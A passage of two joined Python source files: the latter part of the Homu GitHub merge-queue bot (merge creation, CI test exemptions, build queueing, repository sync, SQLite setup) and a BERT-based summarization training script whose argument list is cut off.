'-c',
'user.email=' + git_cfg['email'],
'merge',
'heads/homu-tmp',
'--no-ff',
'-m',
merge_msg),
stderr=subprocess.STDOUT,
universal_newlines=True)
except subprocess.CalledProcessError as e:
comment += '<details><summary>Error message</summary>\n\n```text\n' # noqa
comment += e.output
comment += '\n```\n\n</details>'
pass
else:
if ensure_merge_equal:
if not branch_equal_to_merge(git_cmd, state, branch):
return ''
return git_push(git_cmd, branch, state)
else:
if repo_cfg.get('linear', False) or repo_cfg.get('autosquash', False):
raise RuntimeError('local_git must be turned on to use this feature') # noqa
# if we're merging using the GitHub API, we have no way to predict
# with certainty what the final result will be so make sure the caller
# isn't asking us to keep any promises (see also discussions at
# https://github.com/servo/homu/pull/57)
assert ensure_merge_equal is False
if branch != state.base_ref:
utils.github_set_ref(
state.get_repo(),
'heads/' + branch,
base_sha,
force=True,
)
try:
merge_commit = state.get_repo().merge(
branch,
state.head_sha,
merge_msg)
except github3.models.GitHubError as e:
if e.code != 409:
raise
else:
return merge_commit.sha if merge_commit else ''
state.set_status('error')
utils.github_create_status(
state.get_repo(),
state.head_sha,
'error',
'',
desc,
context='homu')
state.add_comment(':lock: {}\n\n{}'.format(desc, comment))
state.change_labels(LabelEvent.CONFLICT)
return ''
def pull_is_rebased(state, repo_cfg, git_cfg, base_sha):
assert git_cfg['local_git']
git_cmd = init_local_git_cmds(repo_cfg, git_cfg)
utils.logged_call(git_cmd('fetch', 'origin', state.base_ref,
'pull/{}/head'.format(state.num)))
return utils.silent_call(git_cmd('merge-base', '--is-ancestor',
base_sha, state.head_sha)) == 0
# We could fetch this from GitHub instead, but that API is being deprecated:
# https://developer.github.com/changes/2013-04-25-deprecating-merge-commit-sha/
def get_github_merge_sha(state, repo_cfg, git_cfg):
assert git_cfg['local_git']
git_cmd = init_local_git_cmds(repo_cfg, git_cfg)
if state.mergeable is not True:
return None
utils.logged_call(git_cmd('fetch', 'origin',
'pull/{}/merge'.format(state.num)))
return subprocess.check_output(git_cmd('rev-parse', 'FETCH_HEAD')).decode('ascii').strip() # noqa
def do_exemption_merge(state, logger, repo_cfg, git_cfg, url, check_merge,
reason):
try:
merge_sha = create_merge(
state,
repo_cfg,
state.base_ref,
logger,
git_cfg,
check_merge)
except subprocess.CalledProcessError:
print('* Unable to create a merge commit for the exempted PR: {}'.format(state)) # noqa
traceback.print_exc()
return False
if not merge_sha:
return False
desc = 'Test exempted'
state.set_status('success')
utils.github_create_status(state.get_repo(), state.head_sha, 'success',
url, desc, context='homu')
state.add_comment(':zap: {}: {}.'.format(desc, reason))
state.change_labels(LabelEvent.EXEMPTED)
state.merge_sha = merge_sha
state.save()
state.fake_merge(repo_cfg)
return True
def try_travis_exemption(state, logger, repo_cfg, git_cfg):
travis_info = None
for info in utils.github_iter_statuses(state.get_repo(), state.head_sha):
if info.context == 'continuous-integration/travis-ci/pr':
travis_info = info
break
if travis_info is None or travis_info.state != 'success':
return False
mat = re.search('/builds/([0-9]+)$', travis_info.target_url)
if not mat:
return False
url = 'https://api.travis-ci.org/{}/{}/builds/{}'.format(state.owner,
state.name,
mat.group(1))
try:
res = requests.get(url)
except Exception as ex:
print('* Unable to gather build info from Travis CI: {}'.format(ex))
return False
travis_sha = json.loads(res.text)['commit']
travis_commit = state.get_repo().commit(travis_sha)
if not travis_commit:
return False
base_sha = state.get_repo().ref('heads/' + state.base_ref).object.sha
if (travis_commit.parents[0]['sha'] == base_sha and
travis_commit.parents[1]['sha'] == state.head_sha):
# make sure we check against the github merge sha before pushing
return do_exemption_merge(state, logger, repo_cfg, git_cfg,
travis_info.target_url, True,
"merge already tested by Travis CI")
return False
def try_status_exemption(state, logger, repo_cfg, git_cfg):
# If all the builders are status-based, then we can do some checks to
# exempt testing under the following cases:
# 1. The PR head commit has the equivalent statuses set to 'success' and
# it is fully rebased on the HEAD of the target base ref.
# 2. The PR head and merge commits have the equivalent statuses set to
# state 'success' and the merge commit's first parent is the HEAD of
# the target base ref.
if not git_cfg['local_git']:
raise RuntimeError('local_git is required to use status exemption')
statuses_all = set()
# equivalence dict: pr context --> auto context
status_equivalences = {}
for key, value in repo_cfg['status'].items():
context = value.get('context')
pr_context = value.get('pr_context', context)
if context is not None:
statuses_all.add(context)
status_equivalences[pr_context] = context
assert len(statuses_all) > 0
# let's first check that all the statuses we want are set to success
statuses_pass = set()
for info in utils.github_iter_statuses(state.get_repo(), state.head_sha):
if info.context in status_equivalences and info.state == 'success':
statuses_pass.add(status_equivalences[info.context])
if statuses_all != statuses_pass:
return False
# is the PR fully rebased?
base_sha = state.get_repo().ref('heads/' + state.base_ref).object.sha
if pull_is_rebased(state, repo_cfg, git_cfg, base_sha):
return do_exemption_merge(state, logger, repo_cfg, git_cfg, '', False,
"pull fully rebased and already tested")
# check if we can use the github merge sha as proof
merge_sha = get_github_merge_sha(state, repo_cfg, git_cfg)
if merge_sha is None:
return False
statuses_merge_pass = set()
for info in utils.github_iter_statuses(state.get_repo(), merge_sha):
if info.context in status_equivalences and info.state == 'success':
statuses_merge_pass.add(status_equivalences[info.context])
merge_commit = state.get_repo().commit(merge_sha)
if (statuses_all == statuses_merge_pass and
merge_commit.parents[0]['sha'] == base_sha and
merge_commit.parents[1]['sha'] == state.head_sha):
# make sure we check against the github merge sha before pushing
return do_exemption_merge(state, logger, repo_cfg, git_cfg, '', True,
"merge already tested")
return False
def start_build(state, repo_cfgs, buildbot_slots, logger, db, git_cfg):
if buildbot_slots[0]:
return True
lazy_debug(logger, lambda: "start_build on {!r}".format(state.get_repo()))
pr = state.get_repo().pull_request(state.num)
assert state.head_sha == pr.head.sha
assert state.base_ref == pr.base.ref
repo_cfg = repo_cfgs[state.repo_label]
builders = []
branch = 'try' if state.try_ else 'auto'
branch = repo_cfg.get('branch', {}).get(branch, branch)
can_try_travis_exemption = False
only_status_builders = True
if 'buildbot' in repo_cfg:
if state.try_:
builders += repo_cfg['buildbot']['try_builders']
else:
builders += repo_cfg['buildbot']['builders']
only_status_builders = False
if 'travis' in repo_cfg:
builders += ['travis']
only_status_builders = False
if 'status' in repo_cfg:
found_travis_context = False
for key, value in repo_cfg['status'].items():
context = value.get('context')
if context is not None:
if state.try_ and not value.get('try', True):
# Skip this builder for tries.
continue
builders += ['status-' + key]
# We have an optional fast path if the Travis test passed
# for a given commit and master is unchanged, we can do
# a direct push.
if context == 'continuous-integration/travis-ci/push':
found_travis_context = True
if found_travis_context and len(builders) == 1:
can_try_travis_exemption = True
if 'checks' in repo_cfg:
builders += [
'checks-' + key
for key, value in repo_cfg['checks'].items()
if 'name' in value or (state.try_ and 'try_name' in value)
]
only_status_builders = False
if len(builders) == 0:
raise RuntimeError('Invalid configuration')
lazy_debug(logger, lambda: "start_build: builders={!r}".format(builders))
if (only_status_builders and state.approved_by and
repo_cfg.get('status_based_exemption', False)):
if can_try_travis_exemption:
if try_travis_exemption(state, logger, repo_cfg, git_cfg):
return True
if try_status_exemption(state, logger, repo_cfg, git_cfg):
return True
merge_sha = create_merge(state, repo_cfg, branch, logger, git_cfg)
lazy_debug(logger, lambda: "start_build: merge_sha={}".format(merge_sha))
if not merge_sha:
return False
state.init_build_res(builders)
state.merge_sha = merge_sha
state.save()
if 'buildbot' in repo_cfg:
buildbot_slots[0] = state.merge_sha
logger.info('Starting build of {}/{}#{} on {}: {}'.format(
state.owner,
state.name,
state.num,
branch,
state.merge_sha))
timeout = repo_cfg.get('timeout', DEFAULT_TEST_TIMEOUT)
state.start_testing(timeout)
desc = '{} commit {} with merge {}...'.format(
'Trying' if state.try_ else 'Testing',
state.head_sha,
state.merge_sha,
)
utils.github_create_status(
state.get_repo(),
state.head_sha,
'pending',
'',
desc,
context='homu')
if state.try_:
state.add_comment(comments.TryBuildStarted(
head_sha=state.head_sha,
merge_sha=state.merge_sha,
))
else:
state.add_comment(comments.BuildStarted(
head_sha=state.head_sha,
merge_sha=state.merge_sha,
))
return True
def start_rebuild(state, repo_cfgs):
repo_cfg = repo_cfgs[state.repo_label]
if 'buildbot' not in repo_cfg or not state.build_res:
return False
builders = []
succ_builders = []
for builder, info in state.build_res.items():
if not info['url']:
return False
if info['res']:
succ_builders.append([builder, info['url']])
else:
builders.append([builder, info['url']])
if not builders or not succ_builders:
return False
base_sha = state.get_repo().ref('heads/' + state.base_ref).object.sha
_parents = state.get_repo().commit(state.merge_sha).parents
parent_shas = [x['sha'] for x in _parents]
if base_sha not in parent_shas:
return False
utils.github_set_ref(
state.get_repo(),
'tags/homu-tmp',
state.merge_sha,
force=True)
builders.sort()
succ_builders.sort()
with buildbot_sess(repo_cfg) as sess:
for builder, url in builders:
res = sess.post(url + '/rebuild', allow_redirects=False, data={
'useSourcestamp': 'exact',
'comments': 'Initiated by Homu',
})
if 'authzfail' in res.text:
err = 'Authorization failed'
elif builder in res.text:
err = ''
else:
mat = re.search('<title>(.+?)</title>', res.text)
err = mat.group(1) if mat else 'Unknown error'
if err:
state.add_comment(':bomb: Failed to start rebuilding: `{}`'.format(err)) # noqa
return False
timeout = repo_cfg.get('timeout', DEFAULT_TEST_TIMEOUT)
state.start_testing(timeout)
msg_1 = 'Previous build results'
msg_2 = ' for {}'.format(', '.join('[{}]({})'.format(builder, url) for builder, url in succ_builders)) # noqa
msg_3 = ' are reusable. Rebuilding'
msg_4 = ' only {}'.format(', '.join('[{}]({})'.format(builder, url) for builder, url in builders)) # noqa
utils.github_create_status(
state.get_repo(),
state.head_sha,
'pending',
'',
'{}{}...'.format(msg_1, msg_3),
context='homu')
state.add_comment(':zap: {}{}{}{}...'.format(msg_1, msg_2, msg_3, msg_4))
return True
def start_build_or_rebuild(state, repo_cfgs, *args):
if start_rebuild(state, repo_cfgs):
return True
return start_build(state, repo_cfgs, *args)
def process_queue(states, repos, repo_cfgs, logger, buildbot_slots, db,
git_cfg):
for repo_label, repo in repos.items():
repo_states = sorted(states[repo_label].values())
for state in repo_states:
lazy_debug(logger, lambda: "process_queue: state={!r}, building {}"
.format(state, repo_label))
if state.priority < repo.treeclosed:
continue
if state.status == 'pending' and not state.try_:
break
elif state.status == 'success' and hasattr(state, 'fake_merge_sha'): # noqa
break
elif state.status == '' and state.approved_by:
if start_build_or_rebuild(state, repo_cfgs, buildbot_slots,
logger, db, git_cfg):
return
elif state.status == 'success' and state.try_ and state.approved_by: # noqa
state.try_ = False
state.save()
if start_build(state, repo_cfgs, buildbot_slots, logger, db,
git_cfg):
return
for state in repo_states:
if state.status == '' and state.try_:
if start_build(state, repo_cfgs, buildbot_slots, logger, db,
git_cfg):
return
def fetch_mergeability(mergeable_que):
re_pull_num = re.compile('(?i)merge (?:of|pull request) #([0-9]+)')
while True:
try:
state, cause = mergeable_que.get()
if state.status == 'success':
continue
pull_request = state.get_repo().pull_request(state.num)
if pull_request is None or pull_request.mergeable is None:
time.sleep(5)
pull_request = state.get_repo().pull_request(state.num)
mergeable = pull_request is not None and pull_request.mergeable
if state.mergeable is True and mergeable is False:
if cause:
mat = re_pull_num.search(cause['title'])
if mat:
issue_or_commit = '#' + mat.group(1)
else:
issue_or_commit = cause['sha']
else:
issue_or_commit = ''
_blame = ''
if issue_or_commit:
_blame = ' (presumably {})'.format(issue_or_commit)
state.add_comment(
':umbrella: The latest upstream changes{} made this '
'pull request unmergeable. Please [resolve the merge conflicts]' # noqa
'(https://rustc-dev-guide.rust-lang.org/git.html#conflicts).' # noqa
.format(_blame)
)
state.change_labels(LabelEvent.CONFLICT)
state.set_mergeable(mergeable, que=False)
except Exception:
print('* Error while fetching mergeability')
traceback.print_exc()
finally:
mergeable_que.task_done()
def synchronize(repo_label, repo_cfg, logger, gh, states, repos, db, mergeable_que, my_username, repo_labels): # noqa
logger.info('Synchronizing {}...'.format(repo_label))
repo = gh.repository(repo_cfg['owner'], repo_cfg['name'])
db_query(db, 'DELETE FROM pull WHERE repo = ?', [repo_label])
db_query(db, 'DELETE FROM build_res WHERE repo = ?', [repo_label])
db_query(db, 'DELETE FROM mergeable WHERE repo = ?', [repo_label])
saved_states = {}
for num, state in states[repo_label].items():
saved_states[num] = {
'merge_sha': state.merge_sha,
'build_res': state.build_res,
}
states[repo_label] = {}
repos[repo_label] = Repository(repo, repo_label, db)
for pull in repo.iter_pulls(state='open'):
db_query(
db,
'SELECT status FROM pull WHERE repo = ? AND num = ?',
[repo_label, pull.number])
row = db.fetchone()
if row:
status = row[0]
else:
status = ''
for info in utils.github_iter_statuses(repo, pull.head.sha):
if info.context == 'homu':
status = info.state
break
state = PullReqState(pull.number, pull.head.sha, status, db, repo_label, mergeable_que, gh, repo_cfg['owner'], repo_cfg['name'], repo_cfg.get('labels', {}), repos, repo_cfg.get('test-on-fork')) # noqa
state.title = pull.title
state.body = suppress_pings(pull.body)
state.body = suppress_ignore_block(state.body)
state.head_ref = pull.head.repo[0] + ':' + pull.head.ref
state.base_ref = pull.base.ref
state.set_mergeable(None)
state.assignee = pull.assignee.login if pull.assignee else ''
for comment in pull.iter_comments():
if comment.original_commit_id == pull.head.sha:
parse_commands(
comment.body,
comment.user.login,
comment.user.id,
repo_label,
repo_cfg,
state,
my_username,
db,
states,
sha=comment.original_commit_id,
command_src=comment.to_json()['html_url'],
# FIXME switch to `comment.html_url`
# after updating github3 to 1.3.0+
)
for comment in pull.iter_issue_comments():
parse_commands(
comment.body,
comment.user.login,
comment.user.id,
repo_label,
repo_cfg,
state,
my_username,
db,
states,
command_src=comment.to_json()['html_url'],
# FIXME switch to `comment.html_url`
# after updating github3 to 1.3.0+
)
saved_state = saved_states.get(pull.number)
if saved_state:
for key, val in saved_state.items():
setattr(state, key, val)
state.save()
states[repo_label][pull.number] = state
logger.info('Done synchronizing {}!'.format(repo_label))
def process_config(config):
# Replace environment variables
if type(config) == str:
for var in VARIABLES_RE.findall(config):
try:
config = config.replace("${"+var+"}", os.environ[var])
except KeyError:
raise RuntimeError(
f"missing environment variable ${var} "
f"(requested in the configuration file)"
) from None
return config
# Recursively apply the processing
elif type(config) == list:
return [process_config(item) for item in config]
elif type(config) == dict:
return {key: process_config(value) for key, value in config.items()}
# All other values should be returned as-is
else:
return config
def arguments():
parser = argparse.ArgumentParser(
description='A bot that integrates with GitHub and your favorite '
'continuous integration service')
parser.add_argument(
'-v',
'--verbose',
action='store_true',
help='Enable more verbose logging')
parser.add_argument(
'-c',
'--config',
action='store',
help='Path to cfg.toml',
default='cfg.toml')
return parser.parse_args()
def main():
global global_cfg
args = arguments()
logger = logging.getLogger('homu')
logger.setLevel(logging.DEBUG if args.verbose else logging.INFO)
logger.addHandler(logging.StreamHandler())
if sys.getfilesystemencoding() == 'ascii':
logger.info('You need to set a locale compatible with unicode or homu will choke on Unicode in PR descriptions/titles. See http://stackoverflow.com/a/27931669') # noqa
try:
with open(args.config) as fp:
cfg = toml.loads(fp.read())
except FileNotFoundError:
# Fall back to cfg.json only if we're using the defaults
if args.config == 'cfg.toml':
with open('cfg.json') as fp:
cfg = json.loads(fp.read())
else:
raise
cfg = process_config(cfg)
global_cfg = cfg
gh = github3.login(token=cfg['github']['access_token'])
user = gh.user()
cfg_git = cfg.get('git', {})
user_email = cfg_git.get('email')
if user_email is None:
try:
user_email = [x for x in gh.iter_emails() if x['primary']][0]['email'] # noqa
except IndexError:
raise RuntimeError('Primary email not set, or "user" scope not granted') # noqa
user_name = cfg_git.get('name', user.name if user.name else user.login)
states = {}
repos = {}
repo_cfgs = {}
buildbot_slots = ['']
my_username = user.login
repo_labels = {}
mergeable_que = Queue()
git_cfg = {
'name': user_name,
'email': user_email,
'ssh_key': cfg_git.get('ssh_key', ''),
'local_git': cfg_git.get('local_git', False),
'cache_dir': cfg_git.get('cache_dir', 'cache')
}
db_file = cfg.get('db', {}).get('file', 'main.db')
db_conn = sqlite3.connect(db_file,
check_same_thread=False,
isolation_level=None)
db = db_conn.cursor()
db_query(db, '''CREATE TABLE IF NOT EXISTS pull (
repo TEXT NOT NULL,
num INTEGER NOT NULL,
status TEXT NOT NULL,
merge_sha TEXT,
title TEXT,
body TEXT,
head_sha TEXT,
head_ref TEXT,
base_ref TEXT,
assignee TEXT,
approved_by TEXT,
priority INTEGER,
try_ INTEGER,
rollup INTEGER,
squash INTEGER,
delegate TEXT,
UNIQUE (repo, num)
)''')
db_query(db, '''CREATE TABLE IF NOT EXISTS build_res (
repo TEXT NOT NULL,
num INTEGER NOT NULL,
builder TEXT NOT NULL,
res INTEGER,
url TEXT NOT NULL,
merge_sha TEXT NOT NULL,
UNIQUE (repo, num, builder)
)''')
db_query(db, '''CREATE TABLE IF NOT EXISTS mergeable (
repo TEXT NOT NULL,
num INTEGER NOT NULL,
mergeable INTEGER NOT NULL,
UNIQUE (repo, num)
)''')
db_query(db, '''CREATE TABLE IF NOT EXISTS repos (
repo TEXT NOT NULL,
treeclosed INTEGER NOT NULL,
treeclosed_src TEXT,
UNIQUE (repo)
)''')
db_query(db, '''CREATE TABLE IF NOT EXISTS retry_log (
repo TEXT NOT NULL,
num INTEGER NOT NULL,
time DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP,
src TEXT NOT NULL,
msg TEXT NOT NULL
)''')
db_query(db, '''
CREATE INDEX IF NOT EXISTS retry_log_time_index ON retry_log
(repo, time DESC)
''')
# manual DB migration :/
try:
db_query(db, 'SELECT treeclosed_src FROM repos LIMIT 0')
except sqlite3.OperationalError:
db_query(db, 'ALTER TABLE repos ADD COLUMN treeclosed_src TEXT')
try:
db_query(db, 'SELECT squash FROM pull LIMIT 0')
except sqlite3.OperationalError:
db_query(db, 'ALTER TABLE pull ADD COLUMN squash INT')
for repo_label, repo_cfg in cfg['repo'].items():
repo_cfgs[repo_label] = repo_cfg
repo_labels[repo_cfg['owner'], repo_cfg['name']] = repo_label
# If test-on-fork is enabled point both the main repo and the fork to
# the same homu "repository". This will allow events coming from both
# GitHub repositories to be processed the same way.
if 'test-on-fork' in repo_cfg:
tof = repo_cfg['test-on-fork']
repo_labels[tof['owner'], tof['name']] = repo_label
repo_states = {}
repos[repo_label] = Repository(None, repo_label, db)
db_query(
db,
'SELECT num, head_sha, status, title, body, head_ref, base_ref, assignee, approved_by, priority, try_, rollup, squash, delegate, merge_sha FROM pull WHERE repo = ?', # noqa
[repo_label])
for num, head_sha, status, title, body, head_ref, base_ref, assignee, approved_by, priority, try_, rollup, squash, delegate, merge_sha in db.fetchall(): # noqa
state = PullReqState(num, head_sha, status, db, repo_label, mergeable_que, gh, repo_cfg['owner'], repo_cfg['name'], repo_cfg.get('labels', {}), repos, repo_cfg.get('test-on-fork')) # noqa
state.title = title
state.body = body
state.head_ref = head_ref
state.base_ref = base_ref
state.assignee = assignee
state.approved_by = approved_by
state.priority = int(priority)
state.try_ = bool(try_)
state.rollup = rollup
state.squash = bool(squash)
state.delegate = delegate
builders = []
if merge_sha:
if 'buildbot' in repo_cfg:
builders += repo_cfg['buildbot']['builders']
if 'travis' in repo_cfg:
builders += ['travis']
if 'status' in repo_cfg:
builders += ['status-' + key for key, value in repo_cfg['status'].items() if 'context' in value] # noqa
if 'checks' in repo_cfg:
builders += ['checks-' + key for key, value in repo_cfg['checks'].items() if 'name' in value] # noqa
if len(builders) == 0:
raise RuntimeError('Invalid configuration')
state.init_build_res(builders, use_db=False)
state.merge_sha = merge_sha
elif state.status == 'pending':
# FIXME: There might be a better solution
state.status = ''
state.save()
repo_states[num] = state
states[repo_label] = repo_states
db_query(
db,
'SELECT repo, num, builder, res, url, merge_sha FROM build_res')
for repo_label, num, builder, res, url, merge_sha in db.fetchall():
try:
state = states[repo_label][num]
if builder not in state.build_res:
raise KeyError
if state.merge_sha != merge_sha:
raise KeyError
except KeyError:
db_query(
db,
'DELETE FROM build_res WHERE repo = ? AND num = ? AND builder = ?', # noqa
[repo_label, num, builder])
continue
state.build_res[builder] = {
'res': bool(res) if res is not None else None,
'url': url,
}
db_query(db, 'SELECT repo, num, mergeable FROM mergeable')
for repo_label, num, mergeable in db.fetchall():
try:
state = states[repo_label][num]
except KeyError:
db_query(
db,
'DELETE FROM mergeable WHERE repo = ? AND num = ?',
[repo_label, num])
continue
state.mergeable = bool(mergeable) if mergeable is not None else None
db_query(db, 'SELECT repo FROM pull GROUP BY repo')
for repo_label, in db.fetchall():
if repo_label not in repos:
db_query(db, 'DELETE FROM pull WHERE repo = ?', [repo_label])
queue_handler_lock = Lock()
def queue_handler():
with queue_handler_lock:
return process_queue(states, repos, repo_cfgs, logger, buildbot_slots, db, git_cfg) # noqa
os.environ['GIT_SSH'] = os.path.join(os.path.dirname(__file__), 'git_helper.py') # noqa
os.environ['GIT_EDITOR'] = 'cat'
from . import server
Thread(
target=server.start,
args=[
cfg,
states,
queue_handler,
repo_cfgs,
repos,
logger,
buildbot_slots,
my_username,
db,
repo_labels,
mergeable_que,
gh,
]).start()
Thread(target=fetch_mergeability, args=[mergeable_que]).start()
queue_handler()
if __name__ == '__main__':
main()
|
train.py
|
#!/usr/bin/env python
"""
Main training workflow
"""
from __future__ import division
import argparse
import glob
import os
import random
import signal
import time
import torch
from pytorch_pretrained_bert import BertConfig
import distributed
from models import data_loader, model_builder
from models.data_loader import load_dataset
from models.model_builder import Summarizer
from models.trainer import build_trainer
from others.logging import logger, init_logger
model_flags = ['hidden_size', 'ff_size', 'heads', 'inter_layers','encoder','ff_actv', 'use_interval','rnn_size']
def str2bool(v):
if v.lower() in ('yes', 'true', 't', 'y', '1'):
return True
elif v.lower() in ('no', 'false', 'f', 'n', '0'):
return False
else:
raise argparse.ArgumentTypeError('Boolean value expected.')
def multi_main(args):
""" Spawns 1 process per GPU """
init_logger()
nb_gpu = args.world_size
mp = torch.multiprocessing.get_context('spawn')
# Create a thread to listen for errors in the child processes.
error_queue = mp.SimpleQueue()
error_handler = ErrorHandler(error_queue)
# Train with multiprocessing.
procs = []
for i in range(nb_gpu):
device_id = i
procs.append(mp.Process(target=run, args=(args,
device_id, error_queue,), daemon=True))
procs[i].start()
logger.info(" Starting process pid: %d " % procs[i].pid)
error_handler.add_child(procs[i].pid)
for p in procs:
p.join()
def run(args, device_id, error_queue):
""" run process """
setattr(args, 'gpu_ranks', [int(i) for i in args.gpu_ranks])
try:
gpu_rank = distributed.multi_init(device_id, args.world_size, args.gpu_ranks)
print('gpu_rank %d' %gpu_rank)
if gpu_rank != args.gpu_ranks[device_id]:
raise AssertionError("An error occurred in \
Distributed initialization")
train(args,device_id)
except KeyboardInterrupt:
pass # killed by parent, do nothing
except Exception:
# propagate exception to parent process, keeping original traceback
import traceback
error_queue.put((args.gpu_ranks[device_id], traceback.format_exc()))
class ErrorHandler(object):
"""A class that listens for exceptions in children processes and propagates
the tracebacks to the parent process."""
def __init__(self, error_queue):
""" init error handler """
import signal
import threading
self.error_queue = error_queue
self.children_pids = []
self.error_thread = threading.Thread(
target=self.error_listener, daemon=True)
self.error_thread.start()
signal.signal(signal.SIGUSR1, self.signal_handler)
def add_child(self, pid):
""" error handler """
self.children_pids.append(pid)
def error_listener(self):
""" error listener """
(rank, original_trace) = self.error_queue.get()
self.error_queue.put((rank, original_trace))
os.kill(os.getpid(), signal.SIGUSR1)
def signal_handler(self, signalnum, stackframe):
""" signal handler """
for pid in self.children_pids:
os.kill(pid, signal.SIGINT) # kill children processes
(rank, original_trace) = self.error_queue.get()
msg = """\n\n-- Tracebacks above this line can probably
be ignored --\n\n"""
msg += original_trace
raise Exception(msg)
def wait_and_validate(args, device_id):
timestep = 0
if (args.test_all):
cp_files = sorted(glob.glob(os.path.join(args.model_path, 'model_step_*.pt')))
cp_files.sort(key=os.path.getmtime)
xent_lst = []
for i, cp in enumerate(cp_files):
step = int(cp.split('.')[-2].split('_')[-1])
xent = validate(args, device_id, cp, step)
xent_lst.append((xent, cp))
max_step = xent_lst.index(min(xent_lst))
if (i - max_step > 10):
break
xent_lst = sorted(xent_lst, key=lambda x: x[0])[:3]
logger.info('PPL %s' % str(xent_lst))
for xent, cp in xent_lst:
step = int(cp.split('.')[-2].split('_')[-1])
test(args, device_id, cp, step)
else:
while (True):
cp_files = sorted(glob.glob(os.path.join(args.model_path, 'model_step_*.pt')))
cp_files.sort(key=os.path.getmtime)
if (cp_files):
cp = cp_files[-1]
time_of_cp = os.path.getmtime(cp)
if (not os.path.getsize(cp) > 0):
time.sleep(60)
continue
if (time_of_cp > timestep):
timestep = time_of_cp
step = int(cp.split('.')[-2].split('_')[-1])
validate(args, device_id, cp, step)
test(args, device_id, cp, step)
cp_files = sorted(glob.glob(os.path.join(args.model_path, 'model_step_*.pt')))
cp_files.sort(key=os.path.getmtime)
if (cp_files):
cp = cp_files[-1]
time_of_cp = os.path.getmtime(cp)
if (time_of_cp > timestep):
continue
else:
time.sleep(300)
def validate(args, device_id, pt, step):
device = "cpu" if args.visible_gpus == '-1' else "cuda"
if (pt != ''):
test_from = pt
else:
test_from = args.test_from
logger.info('Loading checkpoint from %s' % test_from)
checkpoint = torch.load(test_from, map_location=lambda storage, loc: storage)
opt = vars(checkpoint['opt'])
for k in opt.keys():
if (k in model_flags):
setattr(args, k, opt[k])
print(args)
config = BertConfig.from_json_file(args.bert_config_path)
model = Summarizer(args, device, load_pretrained_bert=False, bert_config = config)
model.load_cp(checkpoint)
model.eval()
valid_iter =data_loader.Dataloader(args, load_dataset(args, 'valid', shuffle=False),
args.batch_size, device,
shuffle=False, is_test=False)
trainer = build_trainer(args, device_id, model, None)
stats = trainer.validate(valid_iter, step)
return stats.xent()
def test(args, device_id, pt, step):
device = "cpu" if args.visible_gpus == '-1' else "cuda"
if (pt != ''):
test_from = pt
else:
test_from = args.test_from
logger.info('Loading checkpoint from %s' % test_from)
checkpoint = torch.load(test_from, map_location=lambda storage, loc: storage)
opt = vars(checkpoint['opt'])
for k in opt.keys():
if (k in model_flags):
setattr(args, k, opt[k])
print(args)
config = BertConfig.from_json_file(args.bert_config_path)
model = Summarizer(args, device, load_pretrained_bert=False, bert_config = config)
model.load_cp(checkpoint)
model.eval()
test_iter =data_loader.Dataloader(args, load_dataset(args, 'test', shuffle=False),
args.batch_size, device,
shuffle=False, is_test=True)
trainer = build_trainer(args, device_id, model, None)
trainer.test(test_iter,step)
def baseline(args, cal_lead=False, cal_oracle=False):
test_iter =data_loader.Dataloader(args, load_dataset(args, 'test', shuffle=False),
args.batch_size, device,
shuffle=False, is_test=True)
trainer = build_trainer(args, device_id, None, None)
#
if (cal_lead):
trainer.test(test_iter, 0, cal_lead=True)
elif (cal_oracle):
trainer.test(test_iter, 0, cal_oracle=True)
def train(args, device_id):
init_logger(args.log_file)
logger.info('sssssssssssssss %d' % device_id)
device = "cpu" if args.visible_gpus == '-1' else "cuda"
logger.info('Device ID %d' % device_id)
logger.info('Device %s' % device)
torch.manual_seed(args.seed)
random.seed(args.seed)
torch.backends.cudnn.deterministic = True
if device_id >= 0:
torch.cuda.set_device(device_id)
torch.cuda.manual_seed(args.seed)
torch.manual_seed(args.seed)
random.seed(args.seed)
torch.backends.cudnn.deterministic = True
# 数据获取
def train_iter_fct():
return data_loader.Dataloader(args, load_dataset(args, 'train', shuffle=True), args.batch_size, device,
shuffle=True, is_test=False)
# Summarizer 这个是干什么的,如何建立模型 学习一下
model = Summarizer(args, device, load_pretrained_bert=True)
if args.train_from != '':
logger.info('Loading checkpoint from %s' % args.train_from)
checkpoint = torch.load(args.train_from,
map_location=lambda storage, loc: storage)
opt = vars(checkpoint['opt'])
for k in opt.keys():
if (k in model_flags):
setattr(args, k, opt[k])
model.load_cp(checkpoint)
optim = model_builder.build_optim(args, model, checkpoint)
else:
optim = model_builder.build_optim(args, model, None)
logger.info(model)
trainer = build_trainer(args, device_id, model, optim)
trainer.train(train_iter_fct, args.train_steps)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("-encoder", default='classifier', type=str, choices=['classifier','transformer','rnn','baseline'])
parser.add_argument("-mode", default='train', type=str, choices=['train','validate','test'])
parser.add_argument("-bert_data_path", default='../bert_data/cnndm')
parser.add_argument("-model_path", default='../models/')
parser.add_argument("-result_path", default='../results/cnndm')
parser.add_argument("-temp_dir", default='../temp')
parser.add_argument("-bert_config_path", default='../bert_config_uncased_base.json')
parser.add_argument("-batch_size", default=1000, type=int)
parser.add_argument("-use_interval", type=str2bool, nargs='?',const=True,default=True)
parser.add_argument("-hidden_size", default=128, type=int)
parser.add_argument("-ff_size", default=512, type=int)
parser.add_argument("-heads", default=4, type=int)
parser.add_argument("-inter_layers", default=2, type=int)
parser.add_argument("-rnn_size", default=512, type=int)
parser.add_argument("-param_init", default=0, type=float)
parser.add_argument("-param_init_glorot", type=str2bool, nargs='?',const=True,default=True)
parser.add_argument("-dropout", default=0.1, type=float)
parser.add_argument("-optim", default='adam', type=str)
parser.add_argument("-lr", default=1, type=float)
parser.add_argument("-beta1", default= 0.9, type=float)
parser.add_argument("-beta2", default=0.999, type=float)
parser.add_argument("-decay_method", default='', type=str)
parser.add_argument("-warmup_steps", default=8000, type=int)
parser.add_argument("-max_grad_norm", default=0, type=float)
parser.add_argument("-save_checkpoint_steps", default=5, type=int)
parser.add_argument("-accum_count", default=1, type=int)
parser.add_argument("-world_size", default=1, type=int)
parser.add_argument("-report_every", default=1, type=int)
parser.add_argument("-train_steps", default=1000, type=int)
parser.add_argument("-recall_eval", type=str2bool, nargs='?',const=True,default=False)
parser.add_argument('-visible_gpus', default='-1', type=str)
parser.add_argument('-gpu_ranks', default='0', type=str)
parser.add_argument('-log_file', default='../logs/cnndm.log')
parser.add_argument('-dataset', default='')
parser.add_argument('-seed', default=666, type=int)
parser.add_argument("-test_all", type=str2bool, nargs='?',const=True,default=False)
parser.add_argument("-test_from", default='')
parser.add_argument("-train_from", default='')
parser.add_argument("-report_rouge", type=str2bool, nargs='?',const=True,default=True)
